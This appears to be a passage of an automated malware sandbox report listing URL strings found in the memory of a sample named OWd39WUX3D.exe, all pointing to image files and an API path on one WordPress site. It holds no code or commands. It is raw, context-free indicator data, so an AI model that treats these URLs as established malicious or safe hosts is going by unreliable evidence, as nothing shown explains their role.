              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobilr567.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/N123.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/SimonJabocWEBDE.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitgreen-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-180x180.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-192x192.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-270x270.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-32x32.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/feliwegerDEweb.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/mobileChristianDEfr.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/nandakamrathENundDEweb-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205-1.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205DEmobile.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
